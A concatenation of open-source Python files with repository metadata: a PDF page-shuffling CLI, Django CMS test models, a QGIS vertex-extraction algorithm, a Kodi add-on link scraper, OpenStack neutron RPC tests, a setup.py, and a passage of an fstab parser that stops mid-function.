size1 = '0 0 0 %fpts' % (height/2)
size2 = '0 %fpts 0 0' % (height/2)
tmp_page1 = pages[i] + '.tmp1.pdf'
tmp_page2 = pages[i] + '.tmp2.pdf'
getstatusoutput(['pdfjam', '--trim', size1, '--outfile', tmp_page1, pages[i]])
getstatusoutput(['pdfjam', '--trim', size2, '--outfile', tmp_page2, pages[i]])
pglist.append(tmp_page1)
pglist.append(tmp_page2)
else:
pglist.append(pages[i])
i += 1
merge(pglist, outfile)
'''Resize all pages one by one.'''
def op_resize(infile, outfile, expression):
assert(expression!=None)
    # WARNING: pdfjam requires the "paper" suffix in the size name. Otherwise it treats both "a4" and "a5" as US letter.
if(re.match(patt_paper, expression) == None):
raise Exception('unsupported paper size %s.' %expression)
sizes = get_pages_size(infile)
same_size = is_same_size(sizes)
is_portrait = get_pages_orientation(sizes)
max_pn = len(sizes)
logging.info('max_pn: ' + str(max_pn))
if(same_size):
cmd = ['pdfjam', '--paper', expression, '--outfile', outfile, infile]
if(not is_portrait):
cmd.append('--landscape')
getstatusoutput(cmd)
return
for i in range(0, max_pn):
cmd = ['pdfjam', '--paper', expression, '--outfile', pg_path(i+1), infile, str(i+1)]
if(not is_portrait):
cmd.append('--landscape')
getstatusoutput(cmd)
cmd = ['pdfjam', '--noautoscale', 'true', '--outfile', outfile]
if(not is_portrait):
cmd.append('--landscape')
for i in range(0, max_pn):
cmd.append(pg_path(i+1))
getstatusoutput(cmd)
'''Scale the page content while keeping the physical page size the same.'''
def op_scale(infile, outfile, expression):
assert(expression!=None)
logging.info('scale_exp: ' + expression)
tokens = expression.split(',')
ratioX, ratioY = float(tokens[0]), float(tokens[1])
# Why "-dFIXEDMEDIA -sPAPERSIZE=a4" doesn't work? http://stackoverflow.com/questions/7446552/resizing-a-pdf-using-ghostscript
#gs -dNOPAUSE -dBATCH -dSAFER -dCompatibilityLevel="1.3" -dPDFSETTINGS="/printer" -dSubsetFonts=true -dEmbedAllFonts=true -sDEVICE=pdfwrite -sOutputFile="out.pdf" -c "<</BeginPage{0.9 0.9 scale 29.75 42.1 translate}>> setpagedevice" -f /home/zhichyu/tmp/A.pdf
sizes = get_pages_size(infile)
same_size = is_same_size(sizes)
if(not same_size):
        raise Exception('The scale operation requires all pages to be the same size!')
cmd = 'gs -dNOPAUSE -dBATCH -dSAFER -dCompatibilityLevel="1.3" -dPDFSETTINGS="/printer" -dSubsetFonts=true -dEmbedAllFonts=true -sDEVICE=pdfwrite -sOutputFile="%s"' % outfile
(width, height) = sizes[0]
# gs scales and moves per the left-bottom. pdfjam scales per the center, and moves per the left-bottom.
offsetX = (1 - ratioX) * 0.5 * width
offsetY = (1 - ratioY) * 0.5 * height
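    # Worked example of the offset math (illustrative): for an A4 page of 595 x 842 pts
    # scaled by ratioX = ratioY = 0.9, offsetX = (1 - 0.9) * 0.5 * 595 = 29.75 and
    # offsetY = (1 - 0.9) * 0.5 * 842 = 42.1, which matches the sample gs command above.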
cmd += ' -c "<</BeginPage{%f %f scale %f %f translate}>> setpagedevice" -f "%s"'%(ratioX, ratioY, offsetX, offsetY, infile)
getstatusoutput(cmd)
def operate(infile, outfile, op, exp):
# clean up temp directory
pages = sorted(pg_paths(), key=pg_num)
for pg_fp in pages:
os.unlink(pg_fp)
if(op=='add'):
op_add(infile, outfile, exp)
elif(op=='delete'):
op_delete(infile, outfile, exp)
elif(op=='move'):
op_move(infile, outfile, exp)
elif(op=='rotate'):
op_rotate(infile, outfile, exp)
elif(op=='join'):
op_join(infile, outfile, exp)
elif(op=='split'):
op_split(infile, outfile, exp)
elif(op=='resize'):
op_resize(infile, outfile, exp)
elif(op=='scale'):
op_scale(infile, outfile, exp)
else:
assert(0)
def main():
usage = '''Edit a pdf file for better printing.
shuffle operations:
add: add blank pages per expression "sub_exp[,sub_exp]*[@n_range]". sub_exp format is "f(n):g(n)". Both f(n) and g(n) are Python expressions of the variable n, such as "12*n". Earlier sub_exps take precedence over later ones, so they are not swappable. If n_range is not specified, it defaults to "0-N", where N is the number of pages plus one. The format of n_range is "sub_range[,sub_range]*". Each sub_range is an integer or an integer pair separated by "-". Example 1: "5:1" means inserting a blank page just before page 5. Example 2: "5*n+1:2" means inserting 2 blank pages just before pages 1, 6, 11, 16, ... Example 3: "5*n+1:2@0,2" is equivalent to "1:2,11:2".
delete: delete pages per expression "sub_exp[,sub_exp]*[@n_range]". Each sub_exp is a Python expression of the variable n, such as "12*n". Example 1: "1,12*n+11,12*n+12" means deleting pages in the set {1, 12n+11, 12n+12 | integer n>=0}. The n_range usage is the same as for the add operation.
move: move pages per expression. The expression format is the same as for add, with the following semantics: earlier sub_exps take precedence over later ones. Example 1: "5:1" means moving page 5 to just before page 1. Example 2: "5*n+5:5*n+1,5*n+4:5*n+1" means reorder all pages per 5n+5.5n+4.5n+1.5n+2.5n+3. Example 3: "5*n+4:5*n+1,5*n+5:5*n+1" means reorder all pages per 5n+4.5n+5.5n+1.5n+2.5n+3.
in-page edit operations:
rotate: rotate pages left (counter-clockwise) per an expression. The expression format is the same as for delete.
join: join a page with the next one per an expression. The expression format is the same as for delete.
split: split a page into two parts per an expression. The expression format is the same as for delete.
page & content size operations:
resize: resize all pages one by one. pdfjam and printers resize all pages per the first page, which causes a disaster if the pages have different sizes. Supported sizes are: aNpaper, where N is an integer in [1,6].
scale: scale the content of all pages, i.e. change the margins of the PDF file while keeping the physical page size the same. The expression is: ratioX,ratioY.
'''
parser = argparse.ArgumentParser(description=usage, formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('-o', '--outfile', metavar='outfile', default=None, help='destination file or directory, edit inplace if not specified')
parser.add_argument('infile', metavar='infile', help='source PDF file')
subparsers = parser.add_subparsers(dest='op', help='sub-command help')
supported_ops = ['add', 'delete', 'move', 'rotate', 'join', 'split', 'resize', 'scale']
for op in supported_ops:
subparser = subparsers.add_parser(op, help='help info of %s'%op)
subparser.add_argument('exp')
args = parser.parse_args()
infile = os.path.abspath(args.infile)
if(not os.path.isfile(infile)):
print('infile is not a file: %s' % infile)
return
if(args.outfile):
outfile = os.path.abspath(args.outfile)
if(os.path.isdir(outfile)):
outfile = os.path.join(outfile, os.path.basename(infile))
else:
outfile = infile
if(args.op):
if(args.op not in supported_ops):
parser.error('operation not supported!')
if(not args.exp):
parser.error('expression is missing!')
logFile = '/tmp/pdf_shuffer.log'
# set up logging to file. Several traps here:
    # 1. If any logging.info(...) is invoked before logging.basicConfig(logFile), the logFile will not be created!
    # 2. If multiple scripts invoke logging.basicConfig(logFile), the logFile will be truncated!
logging.basicConfig(level=logging.DEBUG, format='%(asctime)-15s %(message)s', filename=logFile, filemode='w')
if(args.op):
try:
operate(infile, outfile, args.op, args.exp)
except Exception as e:
print(traceback.format_exc())
print('Error: the above operation failed. The output file could be corrupt!')
else:
#interactive mode. Refers to http://pymotw.com/2/readline/.
readline.parse_and_bind('tab: complete')
readline.parse_and_bind('set editing-mode emacs')
special_ops = ['help', 'quit', 'exit']
all_ops = supported_ops + special_ops
print('type "help" for help, "quit" or "exit" to quit')
prompt = '[op exp] '
while(True):
line = input(prompt)
line = line.strip()
tokens = line.split()
if(not tokens or (not tokens[0] in all_ops) or tokens[0]=='help'):
print(usage)
elif(tokens[0] in ['quit', 'exit']):
break
elif(len(tokens) != 2):
print(usage)
else:
try:
operate(infile, outfile, tokens[0], tokens[1])
# Only the first op is allowed to customize outfile. Later operations edit the file in place.
infile = outfile
except Exception as e:
print(traceback.format_exc())
print('Error: the above operation failed. The output file could be corrupt!')
break
def test_expressions():
max_pn = 420
del_exp = "1,12*n+11,12*n+12@0-3"
add_exp = "12*n+1:2,12*n+2:1@0,10"
mov_exp = "12*n+7:12*n+1,12*n+8:12*n+1"
print('max_pn: ' + str(max_pn))
print('del_exp: ' + del_exp)
print('add_exp: ' + add_exp)
print('mov_exp: ' + mov_exp)
print('del_exp is evaluated to: ')
print(eval_del_exp(max_pn, del_exp))
print('add_exp is evaluated to: ')
print(eval_add_exp(max_pn, add_exp))
print('mov_exp is evaluated to: ')
print(eval_mov_exp(max_pn, mov_exp))
import sys
sys.exit()
if __name__ == '__main__':
#test_expressions()
main()
|
yuzhichang/pdf_shuffer
|
pdf_shuffer.py
|
Python
|
gpl-3.0
| 34,766 | 0.006041 |
from wheelcms_axle.content import Content, FileContent, ImageContent
from wheelcms_axle.spoke import Spoke, action, FileSpoke
from wheelcms_axle.content import type_registry
from django.db import models
class Type1(Content):
t1field = models.TextField(null=True, blank=True)
class Type1Type(Spoke):
model = Type1
discussable = True
@action
def hello(self, handler, request, action):
return ("Hello", request, handler, self, action)
class Type2(Content):
pass
class Type2Type(Spoke):
model = Type2
discussable = False
class TestFile(FileContent):
storage = models.FileField(upload_to="files", blank=False)
class TestFileType(FileSpoke):
model = TestFile
children = ()
class OtherTestFile(FileContent):
storage = models.FileField(upload_to="files", blank=False)
class OtherTestFileType(FileSpoke):
model = OtherTestFile
children = ()
class TestImage(ImageContent):
storage = models.ImageField(upload_to="images", blank=False)
class TestImageType(FileSpoke):
model = TestImage
children = ()
class OtherTestImage(ImageContent):
storage = models.ImageField(upload_to="images", blank=False)
class OtherTestImageType(FileSpoke):
model = OtherTestImage
children = ()
class TypeM2M(Content):
m2m = models.ManyToManyField("self")
class TypeM2MType(Spoke):
model = TypeM2M
class TypeUnique(Content):
uniek = models.TextField(unique=True)
class TypeUniqueType(Spoke):
model = TypeUnique
type_registry.register(Type1Type)
type_registry.register(Type2Type)
type_registry.register(TestFileType)
type_registry.register(TestImageType)
type_registry.register(OtherTestFileType)
type_registry.register(OtherTestImageType)
type_registry.register(TypeM2MType)
type_registry.register(TypeUniqueType)
from wheelcms_axle.models import Configuration as BaseConfiguration
from wheelcms_axle.registries.configuration import configuration_registry
class Configuration(models.Model):
main = models.ForeignKey(BaseConfiguration, related_name="testconf")
value = models.TextField(blank=True)
configuration_registry.register("testconf", "ConfTest", Configuration, None)
|
wheelcms/wheelcms_axle
|
wheelcms_axle/tests/models.py
|
Python
|
bsd-2-clause
| 2,181 | 0.006419 |
# -*- coding: utf-8 -*-
"""
***************************************************************************
ExtractSpecificVertices.py
--------------------
Date : October 2016
Copyright : (C) 2016 by Nyall Dawson
Email : nyall dot dawson at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Nyall Dawson'
__date__ = 'October 2016'
__copyright__ = '(C) 2016, Nyall Dawson'
import math
from processing.algs.qgis.QgisAlgorithm import QgisAlgorithm
from qgis.core import (QgsWkbTypes,
QgsVertexId,
QgsFeature,
QgsFeatureSink,
QgsFeatureRequest,
QgsGeometry,
QgsField,
QgsProcessing,
QgsProcessingFeatureSource,
QgsProcessingParameterFeatureSource,
QgsProcessingParameterString,
QgsProcessingParameterFeatureSink,
QgsProcessingException)
from qgis.PyQt.QtCore import QVariant
class ExtractSpecificVertices(QgisAlgorithm):
INPUT = 'INPUT'
OUTPUT = 'OUTPUT'
VERTICES = 'VERTICES'
def group(self):
return self.tr('Vector geometry')
def groupId(self):
return 'vectorgeometry'
def __init__(self):
super().__init__()
def initAlgorithm(self, config=None):
self.addParameter(QgsProcessingParameterFeatureSource(self.INPUT,
self.tr('Input layer'), [QgsProcessing.TypeVectorAnyGeometry]))
self.addParameter(QgsProcessingParameterString(self.VERTICES,
self.tr('Vertex indices'), defaultValue='0'))
self.addParameter(QgsProcessingParameterFeatureSink(self.OUTPUT, self.tr('Vertices'), QgsProcessing.TypeVectorPoint))
def name(self):
return 'extractspecificvertices'
def displayName(self):
return self.tr('Extract specific vertices')
def tags(self):
return self.tr('points,vertex,nodes').split(',')
def processAlgorithm(self, parameters, context, feedback):
source = self.parameterAsSource(parameters, self.INPUT, context)
if source is None:
raise QgsProcessingException(self.invalidSourceError(parameters, self.INPUT))
fields = source.fields()
fields.append(QgsField('vertex_pos', QVariant.Int))
fields.append(QgsField('vertex_index', QVariant.Int))
fields.append(QgsField('vertex_part', QVariant.Int))
if QgsWkbTypes.geometryType(source.wkbType()) == QgsWkbTypes.PolygonGeometry:
fields.append(QgsField('vertex_part_ring', QVariant.Int))
fields.append(QgsField('vertex_part_index', QVariant.Int))
fields.append(QgsField('distance', QVariant.Double))
fields.append(QgsField('angle', QVariant.Double))
wkb_type = QgsWkbTypes.Point
if QgsWkbTypes.hasM(source.wkbType()):
wkb_type = QgsWkbTypes.addM(wkb_type)
if QgsWkbTypes.hasZ(source.wkbType()):
wkb_type = QgsWkbTypes.addZ(wkb_type)
(sink, dest_id) = self.parameterAsSink(parameters, self.OUTPUT, context,
fields, wkb_type, source.sourceCrs(), QgsFeatureSink.RegeneratePrimaryKey)
if sink is None:
raise QgsProcessingException(self.invalidSinkError(parameters, self.OUTPUT))
vertex_indices_string = self.parameterAsString(parameters, self.VERTICES, context)
indices = []
for vertex in vertex_indices_string.split(','):
try:
indices.append(int(vertex))
except:
raise QgsProcessingException(
self.tr('\'{}\' is not a valid vertex index').format(vertex))
features = source.getFeatures(QgsFeatureRequest(), QgsProcessingFeatureSource.FlagSkipGeometryValidityChecks)
total = 100.0 / source.featureCount() if source.featureCount() else 0
for current, f in enumerate(features):
if feedback.isCanceled():
break
input_geometry = f.geometry()
if not input_geometry:
sink.addFeature(f, QgsFeatureSink.FastInsert)
else:
total_vertices = input_geometry.constGet().nCoordinates()
for vertex in indices:
if vertex < 0:
vertex_index = total_vertices + vertex
else:
vertex_index = vertex
if vertex_index < 0 or vertex_index >= total_vertices:
continue
(success, vertex_id) = input_geometry.vertexIdFromVertexNr(vertex_index)
distance = input_geometry.distanceToVertex(vertex_index)
angle = math.degrees(input_geometry.angleAtVertex(vertex_index))
output_feature = QgsFeature()
attrs = f.attributes()
attrs.append(vertex)
attrs.append(vertex_index)
attrs.append(vertex_id.part)
if QgsWkbTypes.geometryType(source.wkbType()) == QgsWkbTypes.PolygonGeometry:
attrs.append(vertex_id.ring)
attrs.append(vertex_id.vertex)
attrs.append(distance)
attrs.append(angle)
output_feature.setAttributes(attrs)
point = input_geometry.vertexAt(vertex_index)
output_feature.setGeometry(QgsGeometry(point))
sink.addFeature(output_feature, QgsFeatureSink.FastInsert)
feedback.setProgress(int(current * total))
return {self.OUTPUT: dest_id}
|
mhugo/QGIS
|
python/plugins/processing/algs/qgis/ExtractSpecificVertices.py
|
Python
|
gpl-2.0
| 6,483 | 0.002314 |
# -*- coding: utf-8 -*-
'''
Exodus Add-on
Copyright (C) 2016 Exodus
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re,urllib,urlparse
from resources.lib.modules import cleantitle
from resources.lib.modules import client
from resources.lib.modules import debrid
class source:
def __init__(self):
self.domains = ['perfecthdmovies.pw']
self.base_link = 'http://www.perfecthdmovies.pw'
self.search_link = '/search/%s/feed/rss2/'
def movie(self, imdb, title, year):
try:
url = {'imdb': imdb, 'title': title, 'year': year}
url = urllib.urlencode(url)
return url
except:
return
def tvshow(self, imdb, tvdb, tvshowtitle, year):
try:
url = {'imdb': imdb, 'tvdb': tvdb, 'tvshowtitle': tvshowtitle, 'year': year}
url = urllib.urlencode(url)
return url
except:
return
def episode(self, url, imdb, tvdb, title, premiered, season, episode):
try:
if url == None: return
url = urlparse.parse_qs(url)
url = dict([(i, url[i][0]) if url[i] else (i, '') for i in url])
url['title'], url['premiered'], url['season'], url['episode'] = title, premiered, season, episode
url = urllib.urlencode(url)
return url
except:
return
def sources(self, url, hostDict, hostprDict):
try:
sources = []
if url == None: return sources
if debrid.status() == False: raise Exception()
data = urlparse.parse_qs(url)
data = dict([(i, data[i][0]) if data[i] else (i, '') for i in data])
title = data['tvshowtitle'] if 'tvshowtitle' in data else data['title']
hdlr = 'S%02dE%02d' % (int(data['season']), int(data['episode'])) if 'tvshowtitle' in data else data['year']
query = '%s S%02dE%02d' % (data['tvshowtitle'], int(data['season']), int(data['episode'])) if 'tvshowtitle' in data else '%s %s' % (data['title'], data['year'])
query = re.sub('(\\\|/| -|:|;|\*|\?|"|\'|<|>|\|)', ' ', query)
url = self.search_link % urllib.quote_plus(query)
url = urlparse.urljoin(self.base_link, url)
r = client.request(url)
posts = client.parseDOM(r, 'item')
hostDict = hostprDict + hostDict
items = []
for post in posts:
try:
t = client.parseDOM(post, 'title')[0]
u = post.split('Download%252BLinks.png', 1)[-1]
u = client.parseDOM(u, 'div', attrs={'style': '.+?'})
u = [re.findall('<a href="(.+?)"', i) for i in u]
u = [i[0] for i in u if i]
items += [(t, i) for i in u]
except:
pass
for item in items:
try:
name = item[0]
name = client.replaceHTMLCodes(name)
t = re.sub('(\.|\(|\[|\s)(\d{4}|S\d*E\d*|S\d*|3D)(\.|\)|\]|\s|)(.+|)', '', name)
if not cleantitle.get(t) == cleantitle.get(title): raise Exception()
y = re.findall('[\.|\(|\[|\s](\d{4}|S\d*E\d*|S\d*)[\.|\)|\]|\s]', name)[-1].upper()
if not y == hdlr: raise Exception()
fmt = re.sub('(.+)(\.|\(|\[|\s)(\d{4}|S\d*E\d*|S\d*)(\.|\)|\]|\s)', '', name.upper())
fmt = re.split('\.|\(|\)|\[|\]|\s|\-', fmt)
fmt = [i.lower() for i in fmt]
if any(i.endswith(('subs', 'sub', 'dubbed', 'dub')) for i in fmt): raise Exception()
if any(i in ['extras'] for i in fmt): raise Exception()
if 'hindi' in fmt and not 'dual' in fmt: raise Exception()
if '1080p' in fmt: quality = '1080p'
elif '720p' in fmt: quality = 'HD'
else: quality = 'SD'
if any(i in ['dvdscr', 'r5', 'r6'] for i in fmt): quality = 'SCR'
elif any(i in ['camrip', 'tsrip', 'hdcam', 'hdts', 'dvdcam', 'dvdts', 'cam', 'telesync', 'ts'] for i in fmt): quality = 'CAM'
info = []
if '3d' in fmt: info.append('3D')
try:
size = re.findall('((?:\d+\.\d+|\d+\,\d+|\d+)(?:Gb|mb))', name)[-1]
div = 1 if size.endswith('Gb') else 1024
size = float(re.sub('[^0-9|/.|/,]', '', size))/div
size = '%.2f GB' % size
info.append(size)
except:
pass
if any(i in ['hevc', 'h265', 'x265'] for i in fmt): info.append('HEVC')
info = ' | '.join(info)
url = item[1]
if any(x in url for x in ['.rar', '.zip', '.iso']): raise Exception()
url = client.replaceHTMLCodes(url)
url = url.encode('utf-8')
host = re.findall('([\w]+[.][\w]+)$', urlparse.urlparse(url.strip().lower()).netloc)[0]
if not host in hostDict: raise Exception()
host = client.replaceHTMLCodes(host)
host = host.encode('utf-8')
sources.append({'source': host, 'quality': quality, 'provider': 'Phdmovies', 'url': url, 'info': info, 'direct': False, 'debridonly': True})
except:
pass
check = [i for i in sources if not i['quality'] == 'CAM']
if check: sources = check
return sources
except:
return sources
def resolve(self, url):
return url
|
JamesLinEngineer/RKMC
|
addons/plugin.video.phstreams/resources/lib/sources/phdmovies_mv_tv.py
|
Python
|
gpl-2.0
| 6,645 | 0.017306 |
# Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Unit Tests for ml2 rpc
"""
import mock
from neutron.agent import rpc as agent_rpc
from neutron.common import topics
from neutron.openstack.common import context
from neutron.plugins.ml2.drivers import type_tunnel
from neutron.plugins.ml2 import rpc as plugin_rpc
from neutron.tests import base
class RpcApiTestCase(base.BaseTestCase):
def _test_rpc_api(self, rpcapi, topic, method, rpc_method, fanout,
**kwargs):
ctxt = context.RequestContext('fake_user', 'fake_project')
expected_retval = 'foo' if method == 'call' else None
expected_msg = kwargs.copy()
with mock.patch.object(rpcapi.client, 'prepare') as mock_prepare:
rpc_method_mock = getattr(mock_prepare.return_value, rpc_method)
rpc_method_mock.return_value = expected_retval
retval = getattr(rpcapi, method)(ctxt, **kwargs)
self.assertEqual(expected_retval, retval)
expected_prepare_args = {}
if fanout:
expected_prepare_args['fanout'] = fanout
if topic != topics.PLUGIN:
expected_prepare_args['topic'] = topic
mock_prepare.assert_called_with(**expected_prepare_args)
rpc_method_mock = getattr(mock_prepare.return_value, rpc_method)
rpc_method_mock.assert_called_with(
ctxt,
method,
**expected_msg)
def test_delete_network(self):
rpcapi = plugin_rpc.AgentNotifierApi(topics.AGENT)
self._test_rpc_api(rpcapi,
topics.get_topic_name(topics.AGENT,
topics.NETWORK,
topics.DELETE),
'network_delete', rpc_method='cast', fanout=True,
network_id='fake_request_spec')
def test_port_update(self):
rpcapi = plugin_rpc.AgentNotifierApi(topics.AGENT)
self._test_rpc_api(rpcapi,
topics.get_topic_name(topics.AGENT,
topics.PORT,
topics.UPDATE),
'port_update', rpc_method='cast', fanout=True,
port='fake_port',
network_type='fake_network_type',
segmentation_id='fake_segmentation_id',
physical_network='fake_physical_network')
def test_tunnel_update(self):
rpcapi = plugin_rpc.AgentNotifierApi(topics.AGENT)
self._test_rpc_api(rpcapi,
topics.get_topic_name(topics.AGENT,
type_tunnel.TUNNEL,
topics.UPDATE),
'tunnel_update', rpc_method='cast', fanout=True,
tunnel_ip='fake_ip', tunnel_type='gre')
def test_device_details(self):
rpcapi = agent_rpc.PluginApi(topics.PLUGIN)
self._test_rpc_api(rpcapi, topics.PLUGIN,
'get_device_details', rpc_method='call',
fanout=False,
device='fake_device',
agent_id='fake_agent_id')
def test_update_device_down(self):
rpcapi = agent_rpc.PluginApi(topics.PLUGIN)
self._test_rpc_api(rpcapi, topics.PLUGIN,
'update_device_down', rpc_method='call',
fanout=False,
device='fake_device',
agent_id='fake_agent_id',
host='fake_host')
def test_tunnel_sync(self):
rpcapi = agent_rpc.PluginApi(topics.PLUGIN)
self._test_rpc_api(rpcapi, topics.PLUGIN,
'tunnel_sync', rpc_method='call',
fanout=False,
tunnel_ip='fake_tunnel_ip',
tunnel_type=None)
def test_update_device_up(self):
rpcapi = agent_rpc.PluginApi(topics.PLUGIN)
self._test_rpc_api(rpcapi, topics.PLUGIN,
'update_device_up', rpc_method='call',
fanout=False,
device='fake_device',
agent_id='fake_agent_id',
host='fake_host')
|
beagles/neutron_hacking
|
neutron/tests/unit/ml2/test_rpcapi.py
|
Python
|
apache-2.0
| 5,110 | 0 |
from .thetvdb import TheTVDB
from .tmdb import TheMDB
|
aminotti/converter
|
lib/scrapper/__init__.py
|
Python
|
gpl-3.0
| 54 | 0 |
import datetime
from judge.utils.timedelta import nice_repr
from . import registry
@registry.filter
def timedelta(value, display='long'):
if value is None:
return value
return nice_repr(value, display)
@registry.filter
def timestampdelta(value, display='long'):
value = datetime.timedelta(seconds=value)
return timedelta(value, display)
@registry.filter
def seconds(timedelta):
return timedelta.total_seconds()
@registry.filter
@registry.render_with('time-remaining-fragment.html')
def as_countdown(timedelta):
return {'countdown': timedelta}
|
DMOJ/site
|
judge/jinja2/timedelta.py
|
Python
|
agpl-3.0
| 584 | 0 |
from setuptools import setup, find_packages
__name__ = 'deanslist'
__version__ = '0.6'
setup(
name=__name__,
version=__version__,
url='https://github.com/donowsolutions/%s' % __name__,
author='Jonathan Elliott Blum',
author_email='jon@donowsolutions.com',
description='DeansList API wrapper',
license='MIT',
packages=['deanslist'],
install_requires=[
'requests >=2.10.0, <3',
],
keywords=['deanslist', 'api', 'wrapper'],
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Education',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Education'
],
)
|
donowsolutions/deanslist
|
setup.py
|
Python
|
mit
| 1,127 | 0 |
"""
fstab - file ``/etc/fstab``
===========================
Parse the ``/etc/fstab`` file into a list of lines. Each line is a dictionary
of fields, named according to their definitions in ``man fstab``:
* ``fs_spec`` - the device to mount
* ``fs_file`` - the mount point
* ``fs_vfstype`` - the type of file system
* ``raw_fs_mntops`` - the mount options as a string
* ``fs_mntops`` - the mount options as a dictionary
* ``fs_freq`` - the dump frequency
* ``fs_passno`` - check the filesystem on reboot in this pass number
* ``raw`` - the RAW line which is useful to front-end
``fs_freq`` and ``fs_passno`` are recorded as integers if found, and zero if
not present.
The ``fs_mntops`` mount options are converted to a dictionary, so that each
option's value set to True so it can be conveniently searched.
This data, as above, is available in the ``data`` property:
* As each row is wrapped in an AttributeDict, each column can also be accessed as a property
  with the same name.
* The mount options are also an AttributeDict object with properties
corresponding to the common mount options.
The data for each mount point is also available via the ``mounted_on``
property; the data is the same as that stored in the ``data`` list.
Typical content of the ``fstab`` looks like::
#
# /etc/fstab
# Created by anaconda on Fri May 6 19:51:54 2016
#
/dev/mapper/rhel_hadoop--test--1-root / xfs defaults 0 0
UUID=2c839365-37c7-4bd5-ac47-040fba761735 /boot xfs defaults 0 0
/dev/mapper/rhel_hadoop--test--1-home /home xfs defaults 0 0
/dev/mapper/rhel_hadoop--test--1-swap swap swap defaults 0 0
/dev/sdb1 /hdfs/data1 xfs rw,relatime,seclabel,attr2,inode64,noquota 0 0
/dev/sdc1 /hdfs/data2 xfs rw,relatime,seclabel,attr2,inode64,noquota 0 0
/dev/sdd1 /hdfs/data3 xfs rw,relatime,seclabel,attr2,inode64,noquota 0 0
localhost:/ /mnt/hdfs nfs rw,vers=3,proto=tcp,nolock,timeo=600 0 0
/dev/mapper/vg0-lv2 /test1 ext4 defaults,data=writeback 1 1
nfs_hostname.redhat.com:/nfs_share/data /srv/rdu/cases/000 nfs ro,defaults,hard,intr,bg,noatime,nodev,nosuid,nfsvers=3,tcp,rsize=32768,wsize=32768 0
Examples:
>>> fstab = shared[FSTab]
>>> len(fstab)
9
>>> fstab.data[0]['fs_spec'] # Note that data is a list not a dict here
'/dev/mapper/rhel_hadoop--test--1-root'
>>> fstab.data[0].fs_spec
'/dev/mapper/rhel_hadoop--test--1-root'
>>> fstab.data[0].raw
'/dev/mapper/rhel_hadoop--test--1-root / xfs defaults 0 0'
>>> fstab.data[0].fs_mntops.defaults
True
>>> 'relatime' in fstab.data[0].fs_mntops
False
>>> fstab.data[0].fs_mntops.get('relatime')
None
>>> fstab.mounted_on['/hdfs/data3'].fs_spec
'/dev/sdd1'
"""
from collections import namedtuple
from .. import Parser, parser, get_active_lines, AttributeDict
from ..parsers import optlist_to_dict, parse_delimited_table, keyword_search
from insights.specs import fstab
FS_HEADINGS = "fs_spec fs_file fs_vfstype raw_fs_mntops fs_freq fs_passno"
type_info = namedtuple('type_info', field_names=['type', 'default'])
@parser(fstab)
class FSTab(Parser):
"""
Parse the content of ``/etc/fstab``.
This object provides the '__len__' and '__iter__' methods to allow it to
be used as a list to iterate over the ``data`` data, e.g.::
>>> if len(fstab) > 0:
>>> for fs in fstab:
>>> print fs.fs_file
>>> print fs.raw
Attributes:
data (list): a list of parsed fstab entries as AttributeDict objects.
mounted_on (dict): a dictionary of AttributeDict objects keyed on mount
point.
"""
def __len__(self):
return len(self.data)
def __iter__(self):
for row in self.data:
yield row
def parse_content(self, content):
"""
Parse each line in the file ``/etc/fstab``.
"""
fstab_output = parse_delimited_table([FS_HEADINGS] + get_active_lines(content))
self.data = []
for line in fstab_output:
line['fs_freq'] = int(line['fs_freq']) if 'fs_freq' in line else 0
line['fs_passno'] = int(line['fs_passno']) if 'fs_passno' in line else 0
# optlist_to_dict converts 'key=value' to key: value and
# 'key' to key: True
line['fs_mntops'] = AttributeDict(optlist_to_dict(line['raw_fs_mntops']))
            # add `raw` here for display convenience on the front end
line['raw'] = [l for l in content if l.startswith(line['fs_spec'])][0]
self.data.append(AttributeDict(line))
# assert: all mount points of valid entries are unique by definition
self.mounted_on = dict((row.fs_file, row) for row in self.data)
def search(self, **kwargs):
"""
Search for the given key/value pairs in the data. Please refer to the
        :py:func:`insights.parsers.keyword_search` function documentation for
a more complete description of how to use this.
Fields that can be searched (as per ``man fstab``):
* ``fs_spec``: the block special or remote filesystem path or label.
* ``fs_file``: The mount point for the filesystem.
* ``fs_vfstype``: The file system type.
        * ``fs_mntops``: The mount options. Since this is also a dictionary,
          this can be searched using the ``__contains`` suffix - see the
          examples below.
* ``fs_freq``: The dump frequency - rarely used.
* ``fs_passno``: The pass for file system checks - rarely used.
Examples:
Search for the root file system:
``fstab.search(fs_file='/')``
Search for file systems mounted from a LABEL declaration
``fstab.search(fs_spec__startswith='LABEL=')``
Search for file systems that use the 'uid' mount option:
``fstab.search(fs_mntops__contains='uid')``
Search for XFS file systems using the 'relatime' option:
``fstab.search(fs_vfstype='xfs', fs_mntops__contains='relatime')``
"""
return keyword_search(self.data, **kwargs)
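# --- Illustrative sketch, not part of the original parser ---------------------
# Roughly what the imported optlist_to_dict() helper is assumed to do with a
# raw_fs_mntops string: bare options map to True, 'key=value' options keep
# their value.  The function name and defaults below are hypothetical.
def _demo_optlist_to_dict(optlist, opt_sep=",", kv_sep="="):
    result = {}
    for opt in optlist.split(opt_sep):
        if kv_sep in opt:
            key, value = opt.split(kv_sep, 1)
            result[key] = value
        else:
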